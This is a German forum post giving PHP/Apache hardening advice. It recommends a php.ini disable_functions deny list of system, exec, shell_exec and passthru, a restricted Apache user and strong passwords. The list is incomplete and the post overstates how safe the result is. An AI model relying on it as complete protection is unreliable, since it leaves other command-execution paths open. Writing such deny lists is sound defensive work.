Folgende Funktionen sollten in den meisten Fällen besser deaktiviert werden (wer noch mehr "gefährliche" Funktionen weiß bitte sagen):
- system (führt ein externes Programm aus)
- exec (führt ein externes Programm aus)
- shell_exec (führt ein Kommando in der cmd/shell aus)
- passthru (führt ein externes Programm aus)

Also in der php.ini unter disable_functions einfach folgendes eingeben:

disable_functions = system, exec, shell_exec, passthru

speichern, Apache neu starten und die schlimmsten Gefahren sollten gebannt sein. Ich habs gerade ausprobiert, funktioniert wunderbar. Es ist zwar immer noch möglich durch bugs/features von php Skripten auf das document root von Apache zuzugreifen aber darüber hinaus dürfte kein Schaden mehr anzurichten sein. Wenn jetzt Apache noch einen eigenen Benutzer hat der nur Schreibrechte hat wo es wirklich nötig ist (logs, upload Verzeichnis) kann eigentlich nicht mehr viel schief gehen (Passwörter natürlich vorausgesetzt ;-).

Wem noch was einfällt immer her damit. Klar, absolute Sicherheit gibts nicht, aber so ein möchtegern "Hacker" wie bei dir HUnttuCH sollte damit keine Chance mehr haben. Und die Richtigen haben hoffentlich was besseres zu tun...

Gruß Sebastian